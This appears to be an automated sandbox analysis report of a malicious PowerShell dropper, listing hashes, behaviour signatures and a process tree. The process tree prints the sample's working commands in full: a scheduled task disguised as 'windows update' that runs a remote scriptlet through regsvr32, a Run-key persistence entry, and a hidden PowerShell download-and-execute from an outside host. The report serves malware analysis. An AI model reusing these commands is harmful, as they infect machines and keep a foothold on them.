Analysis

  • max time kernel
    81s
  • max time network
    86s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-02-2025 20:39

General

  • Target

    malware-samples-master/2018-04-Common-Malware-Carrier/share.ps1

  • Size

    1KB

  • MD5

    2c9f13f79f1dd88b9b5b1ab3a6e2374b

  • SHA1

    fc7f2e1ad64070be4d44b583155b2ec2af18cb03

  • SHA256

    acec4a38d7b5ef95a2e33dce721c5693e7da966b751ec45bfa3e39b5181c6b19

  • SHA512

    f01fa0a0549a9a26a41dc9ab4f22052d92a699bb7bbd505710034878335ff3e42c624635691e7089fd12d38eaae0613413350f08905a56078b86852842e564f6

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://job.softline.top/loadinglit.gif

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\malware-samples-master\2018-04-Common-Malware-Carrier\share.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2732
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /tn "windows update" /tr "regsvr32 /u /s /i:http://job.softline.top/ad2.jpg scrobj.dll" /sc daily /st 12:00 /F
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:2064
    • C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "windows tasks check" /t REG_SZ /d "c:\windows\tasks\SCHEDLGU.exe" /f
      2⤵
      • Adds Run key to start application
      PID:944
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -Windowstyle hidden -noninteractive -nologo IEX (New-Object Net.WebClient).DownloadString('http://job.softline.top/loadinglit.gif')
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3960

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    38e01d05f1a3c204a4b66f6503a154b4

    SHA1

    1f13df998e49ba099b8142117047ca78c7728826

    SHA256

    098383f853295ab4ca31292fc72f149c4d737544f973232a84f48ba060076610

    SHA512

    d4cf12cc636128328bca08bfefdb5cbd3d7e3fa0b9ab8de99734a9af67c18224146000e2a5b79ad3fcfbcef27290e93fcd8f9c0979c8dd95e47e123b479cbed5

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w2n33le4.gxr.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2732-0-0x00007FFB81A23000-0x00007FFB81A25000-memory.dmp

    Filesize

    8KB

  • memory/2732-1-0x0000024090840000-0x0000024090862000-memory.dmp

    Filesize

    136KB

  • memory/2732-11-0x00007FFB81A20000-0x00007FFB824E1000-memory.dmp

    Filesize

    10.8MB

  • memory/2732-12-0x00007FFB81A20000-0x00007FFB824E1000-memory.dmp

    Filesize

    10.8MB

  • memory/2732-13-0x00007FFB81A20000-0x00007FFB824E1000-memory.dmp

    Filesize

    10.8MB

  • memory/2732-15-0x00007FFB81A20000-0x00007FFB824E1000-memory.dmp

    Filesize

    10.8MB

  • memory/3960-16-0x00007FFB81A20000-0x00007FFB824E1000-memory.dmp

    Filesize

    10.8MB

  • memory/3960-27-0x00007FFB81A20000-0x00007FFB824E1000-memory.dmp

    Filesize

    10.8MB

  • memory/3960-29-0x00007FFB81A20000-0x00007FFB824E1000-memory.dmp

    Filesize

    10.8MB